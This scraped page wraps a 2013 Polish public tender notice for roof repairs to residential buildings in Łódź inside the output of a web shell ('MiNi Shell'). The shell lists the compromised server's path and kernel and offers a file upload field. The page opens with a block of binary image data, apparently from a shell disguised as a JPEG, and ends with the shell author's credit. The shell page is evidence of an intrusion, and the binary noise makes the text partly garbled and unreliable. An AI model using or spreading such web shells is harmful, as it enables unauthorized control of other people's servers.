JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130218/65738-N-2013.html

<p class="kh_header"><b>Łódź: Remonty dachów w administrowanych nieruchomościach</b><br>
<b>Numer ogłoszenia: 65738 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 6847601, faks 42 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wschod.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty dachów w administrowanych nieruchomościach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych - dekarskich polegających na 
    wymianie: pokryć dachowych,  obróbek dachowych i zewnętrznego odwodnienia dachów, robotach 
    ciesielskich związanych z wymianą i uzupełnieniem elementów konstrukcyjnych dachów,     
    murowych związanych z remontem (przemurowaniem) głowic kominowych ponad dachem, 
    tynkarskich związanych z uzupełnieniem lub położeniem nowych tynków na głowicach 
    kominowych, ogniomurach, gzymsach lub ścianach w obrębie montowanych obróbek wraz z 
    pracami towarzyszącymi w nieruchomościach administrowanych przez Zamawiającego ujętych  
    w  czterech częściach: I, II, III, IV,  zwanych pakietami: nr 1, 2, 3, 4, w skład, których wchodzą  
   następujące nieruchomości: 
1.1. Część I  (pakiet nr 1):
       a) Łódź ul. Kilińskiego 242 (przedmiar robót -  zał. nr 1 do SIWZ) budynek mieszkalny,
           frontowy, trzykondygnacyjny z poddaszem użytkowym;        
       b) Łódź ul. Odyńca 5 (przedmiar robót - zał. nr 1A do SIWZ) budynek mieszkalny, frontowy, 
            trzykondygnacyjny z poddaszem użytkowym;

1.2. Część II  (pakiet nr 2):
       a) Łódź ul. Łomżyńska 1 (przedmiar robót - zał. nr 2 do SIWZ) budynek mieszkalny,  
           frontowy, czterokondygnacyjny z poddaszem użytkowym; 
       b) Łódź ul. Poznańska 23 (przedmiar robót - zał. nr 2A do SIWZ) budynek mieszkalny, 
           frontowy, trzykondygnacyjny z poddaszem użytkowym;
  
1.3. Część III  (pakiet nr 3):
       a) Łódź ul. Przybyszewskiego 61 (przedmiar robót - zał. nr 3 do SIWZ) budynek mieszkalny, 
           prawej oficyny, czterokondygnacyjny z poddaszem użytkowym;
       b) Łódź ul. Przybyszewskiego 61 (przedmiar robót - zał. nr 3A do SIWZ) budynek 
           mieszkalny, frontowy, czterokondygnacyjny z poddaszem mieszkalno - użytkowym;
    
1.4. Część IV  (pakiet nr 4):
       a) Łódź ul. Senatorska 30 (przedmiar robót - zał. nr 4 do SIWZ) budynek mieszkalny, 
           front-lewy, trzykondygnacyjny z poddaszem użytkowym;
       b) Łódź ul. Siedlecka 6 (przedmiar robót - zał. nr 4A do SIWZ) budynek mieszkalny, 
           front-poprzeczny, dwukondygnacyjny z poddaszem mieszkalno - użytkowym; 
       c) Łódź ul. Sosnowa 6 (przedmiar robót -  zał. nr 4B do SIWZ) budynek mieszkalny, frontowy,
           dwukondygnacyjny z poddaszem mieszkalno - użytkowym;
       zgodnie z dokumentacją techniczną, która stanowi załączniki do niniejszej  Specyfikacji Istotnych 
       Warunków Zamówienia tj. Specyfikacją Techniczną Wykonania i Odbioru Robót - zał. nr 5 oraz 
       dokumentacją obejmującą ilości robót ujęte w przedmiarach robót w poszczególnych częściach 
       (pakietach) - zał. nr 1, 1A,   2, 2A,   3, 3A,  4, 4A, 4B, w zakresie:
1.5. wykonania robót towarzyszących - tymczasowych:
       a) zajęcie pasa chodnika - ustawienie słupków ograniczających z liną, po zakończeniu robót 
           rozebrania ustawionych słupków, 
1.6. wykonania robót rozbiórkowych:
        a) rozebranie pokrycia dachów z papy,
        b) rozebranie obróbek blacharskich, rynien i rur spustowych,
        c) rozebranie zniszczonego biologicznie deskowania fragmentów dachów i elementów 
            konstrukcyjnych dachów,
        d) rozebranie kominów do przemurowania,
1.7. wykonania robót naprawczo - remontowych:
        a) przemurowanie kominów wieloprzewodowych z cegły pełnej ponad dachem z ich 
             otynkowaniem,
        b) montażu elementów konstrukcyjnych więźby dachowej oraz deskowania,
        c) wykonanie obróbek blacharskich z blachy stalowej ocynkowanej,
        d) wykonanie pokrycia dachów z materiału pokryciowego o następujących wymaganiach:
          
               papa nawierzchniowa 
        papa zgrzewalna z masy asfaltowej modyfikowana  SBS na osnowie z włókniny poliestrowej, 
        gramatura 200 g/m2, siła zrywająca minimum wzdłuż  1000 N/5 cm, w poprzek 700 N/5 cm, 
        elastyczna w  temperaturze do -7 stopni C., odporna na spływanie w podwyższonej 
        temperaturze > 80 stopni C.,  grubość min. 5,2 mm;

                     
                      papa podkładowa
         papa zgrzewalna z masy asfaltowej modyfikowana SBS na osnowie z włókniny poliestrowej, 
         gramatura 100 g/m2, siła zrywająca minimum wzdłuż  400 N/5 cm, w poprzek 300 N/5 cm, 
         elastyczna w  temperaturze do 0 stopni C., odporna na spływanie w podwyższonej 
         temperaturze > 70 stopni C.,  grubość min. 3,0 mm;

   1.8. odtworzenia rynien z blachy stalowej ocynkowanej,
   1.9. uzupełnienia rur spustowych z blachy ocynkowanej,
1.10. uprzątnięcia terenu po wykonanych robotach wraz z wywozem gruzu, papy i rumowia na 
         wysypisko.
2.  W ramach zamówienia Wykonawca zobowiązany będzie do wykonania robót zgodnie z 
     wymaganiami  zawartymi w dokumentacji technicznej stanowiącej załączniki do niniejszej SIWZ
     w zakresie: wykonania robót, dokonania odbioru robót zanikowych oraz ich odbioru końcowego. 
3.  Zamawiający w przedmiocie zamówienia będzie wymagał od Wykonawcy:
   a)  prowadzenia robót budowlanych pod ścisłym nadzorem osób uprawnionych, posiadających 
        uprawnienia budowlane w specjalności konstrukcyjno - budowlanej (wykonawcze) i przy udziale 
        inspektorów nadzoru inwestorskiego wyznaczonych przez Zamawiającego;  
   b)  stosowania materiałów i wyrobów dopuszczonych do obrotu i stosowania w budownictwie;
   c)  okresu gwarancyjnego na wykonane roboty - min. 120 miesięcy od daty odbioru robót,
   d)  zobowiązania się do świadczenia usług w zakresie odśnieżania dachu i usuwania zanieczyszczeń 
        z połaci dachowej  w okresie gwarancji za dodatkowym pisemnym zleceniem i odrębnym 
        wynagrodzeniem wyliczonym każdorazowo na podstawie wynegocjowanej przez strony umowy 
        stawki;
   e)  zobowiązania się do dokonania przed i po zakończeniu sezonu zimowego przeglądu pokrycia 
        dachowego i wykonania w ramach udzielonej gwarancji koniecznych napraw; 
f)  odpowiedzialności za przestrzeganie przepisów bezpieczeństwa i higieny pracy przy         
        wykonywaniu robót budowlanych - zgodnie z Rozporządzeniem  Ministra Infrastruktury z dnia 
        06.02.2003 r., W sprawie bezpieczeństwa i higieny  pracy podczas wykonywania robót 
        budowlanych (Dz.U. nr 47 poz. 401, z póź. zm);
g)  odpowiedzialności za jakość wykonanych robót oraz ich zgodność z dokumentacją;
h)  odpowiedzialności za przestrzeganie przepisów w zakresie p/poż; 
i)  odpowiedzialności za całość szkód powstałych na skutek prowadzonych robót;
j)  przestrzegania praw osób trzecich, gdyż wszelkie spory z tego wynikające mogą być rozstrzygane 
     na drodze sądowej w Sądach Powszechnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  W celu potwierdzenia przez Wykonawcę spełnienia warunków udziału w postępowaniu, o których  
     mowa w art. 22 ust. 1 ustawy, który dotyczy:
  a) posiadania wiedzy i doświadczenia;
     Zamawiający żąda od Wykonawcy udokumentowania dla dowolnie wybranej części (pakietu) 
     posiadanej wiedzy i doświadczenia poprzez wykazanie w zał. nr 6 do niniejszej SIWZ, 
     wykonanych robót budowlanych w okresie ostatnich pięciu lat  przed upływem terminu składania 
     ofert, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 
     robotom budowlanym stanowiącym  przedmiot zamówienia z podaniem ich wartości, przedmiotu, 
     dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że wykazane w 
     załączniku roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i 
     prawidłowo ukończone w następujących ilościach:
     - dla części I (pakietu nr 1 ) - co najmniej jednej roboty na kwotę brutto: min. 50.000,00 zł. 
     - dla części II (pakietu nr 2) - co najmniej jednej roboty na kwotę brutto: min. 50.000,00 zł. 
     - dla części III (pakietu nr 3) - co najmniej jednej roboty na kwotę brutto: min. 50.000,00 zł. 
     - dla części IV (pakietu nr 4) - co najmniej jednej roboty na kwotę brutto: min. 50.000,00 zł. 
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń, na zasadzie (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu, o którym  
      mowa w art. 22 ust. 1 Ustawy, który dotyczy:    
  a) dysponowania osobami zdolnymi do wykonania zamówienia;
      Zamawiający żąda od Wykonawcy wykazania w zał. nr 7 do niniejszej SIWZ wykazu osób, które 
      będą uczestniczyć w wykonywaniu zamówienia  min. cztery osoby w zawodach: murarz-tynkarz, 
      dekarz, cieśla, a także oświadczenia (zał. nr 8 do niniejszej SIWZ)  potwierdzajacego, że  
      Wykonawca lub osoba uczestnicząca w wykonywaniu zamówienia pełniąca na rzecz Wykonawcy 
      obowiązki kierownika robót posiada:  wymagane uprawnienia budowlane w specjalności: 
      konstrukcyjno - budowlanej (wykonawcze) - zgodne z art. 12, 13 i 14 ustawy z dnia 07.07.1994 r.  
      Prawo  Budowlane (D.U. z 1994 r.  z późniejszymi zmianami) oraz aktualne zaświadczenie o 
      przynależności do Okręgowej Izby Inżynierów Budownictwa wraz z załączeniem tych 
      dokumentów. (W przypadku gdy Wykonawca nie posiada stosownych uprawnień lecz zatrudnia 
      osobę z uprawnieniami, która będzie pełnić obowiązki kierownika robót Zamawiający żąda   
      oświadczenia tej osoby o przyjęciu usługi kierowania  prowadzonymi  robotami 
      budowlanymi - dekarskimi na rzecz Wykonawcy).
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez
     Wykonawców dokumentów i oświadczeń, na zasadzie (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu, o którym 
      mowa w art. 22 ust. 1 Ustawy, który dotyczy:
   a) sytuacji ekonomicznej i finansowej;
       Zamawiający żąda od Wykonawcy udokumentowania, że posiada ważną i opłaconą polisę 
       ubezpieczeniową lub inny  dokument potwierdzający, że Wykonawca jest ubezpieczony od 
       odpowiedzialności  cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia 
       minimum  100.000,00 zł. 
      Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
      Wykonawców dokumentów i oświadczeń, na zasadzie (spełnia/ nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wschod.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> A.N. Łódź - Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, pokój 4, w cenie: 25,00 zł. (brutto).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2013 godzina 10:00, miejsce: A.N. Łódź - Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, pokój 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com